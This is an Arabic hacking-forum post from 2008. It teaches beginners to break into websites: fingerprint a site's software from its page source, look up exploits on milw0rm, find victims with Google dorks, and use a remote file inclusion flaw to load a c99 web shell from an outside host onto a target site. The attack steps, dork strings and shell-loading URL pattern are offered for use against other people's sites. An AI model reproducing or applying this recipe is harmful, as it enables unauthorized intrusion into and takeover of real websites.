منتدي الغندورللبرامج

مركز البرامج و الحمايه والتصميمات والفتو شوب والهكر(هذا المنتدي منظومه عربيه للاختراقات العالميه)
 
دخولمكتبة الصورالتسجيلالبوابةالرئيسية

شاطر | 
 

 تبي تخترق بالشل تعال

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
الدكتور
رئيس مجلس الاداره
رئيس مجلس الاداره
avatar

عدد الرسائل : 368
الدوله :
المهنه :
هوايتك :
نقاط العضو :
100 / 100100 / 100

وسام :
تاريخ التسجيل : 16/01/2008

مُساهمةموضوع: تبي تخترق بالشل تعال   الإثنين مايو 19, 2008 5:36 pm

اليوم راح اشرح للاخوان والاخوات الي يرسلووون لي كيفية ربط الشل للاستغلال ....
===========================================
اليوم موضوعنا مثل ما انت العنووووووووان
يله نبدا

بسم الله الرحمن الرحيم :

السلام عليكم اما بعد
اليوم رايح اشرحلكم بساطت رفع شيل على موقع وكيف يتم ذالك طبعا نحن دايم نسمع اختراق عن طريق ثغره رفع شيل صفحت اندكس موجوده على احد المواقع لكن كيف يتم كل هذا .
انته يالمبتداء دايم تروح تدور في المنتديات الهكرز تحاول تتعلم تخترق موقع وتعتقد انه اكتشاف الثغرات شي صعب بس اقولك انه شي سهل الحين رايح نتعلم الاختراق العشوائي والأستهداف.
في عندنا طريقه سهله لختراق المواقع نفترض انك تريد تخترق هذا الموقع www.xxx.com
بس ويش تسوي على شان تعرف ثغرات بسرعه اقولك انه سهل جدا شوف فوق عندك في المتصفح بتلاقي هذي الايقونات file edit view وايقونات ثانيه انته اضغط على view بعدين اختار source رايح يطلعلك كلام بلانجليزي هذا كود صفحت الموقع ويش نريد منه الي نريده سكربت الموقع او اي سكربت يستخدمه الموقع مثل سكربت الستايل
شوف هذي العباره في الكود
<****** type="text/java******">
<!--
// Main vBulletin Java****** Initialization
vBulletin_init();
//-->
</******>
تقول ويش اسوي فيه ؟
ويش تسوي فيه طبعا نحن نريد سكربت يستخدمه الموقع ناخذ هذا مثلا من العباره vBulletin Java****** Initialization
ناخذه ونطير على هذا الموقع وهوه واحد من مواقع السكيرتي
http://www.milw0rm.com
بعد ماندخله نروح الى قائمة البحث ونحط اسم السكربت ورايح تطلع لنا اخر الثغرات.
بس اول شي لازم نعرف كيف نستخدم هذا الموقع في الأطار الي نريده نبدا بلأختراق العشوائي.
ادخل هنا طبعا في الموقع [ web apps ]
طبعا رايح تطلع لنا كثير ثغرات مثلا ناخذ هذي

http://www.milw0rm.com/exploits/4221

طبعا نحن الي يهمنى الاستغلال وكود البحث في جوجل
شوف هنا
هذا أكواد البحث في جوجل
dork:inurl:index.php%"Submit%Articles"%"Member%Log in"%"Top%Authors"
dork:inurl:index.php?pagedb=rss
هذي الكلمه drok هي تعني كود البحث

اما هنا
expl:index.php?page=****l?

فهذا الاستغلال expl تعني استغلال الثغره
الحين نجي للاختراق افتح جوجل ونختار كود البحث هذا
inurl:index.php?pagedb=rss
رايح تطلع لنا مواقع كثيره اختر واحد
بعدين حط الاستغلال الي هوه
index.php?page=****l؟
كلمة شيل تعني رابط الشيل الي تستخدمه
مثلا هذا رابط تشيل
http://casavie.net/hack/c99.txt?
جيب موقع الضحيه الي هوه
www.xxx.com
وحط وراه الاتسغلال يعني يصير كذا
http://www.xxx.com\index.php?=http:/.../hack/c99.txt?
طبعلا لاتنسى ال بعد رابط الشيل وطبعا كذا يتم رفع شيل عن طريقاستغلال ثغره .

_________________

الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://elgandour.onlinegoo.com
 
تبي تخترق بالشل تعال
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتدي الغندورللبرامج :: قسم الحمايه من الهكر :: منتدي جديد الثغرات وطرق الحمايه منها-
انتقل الى: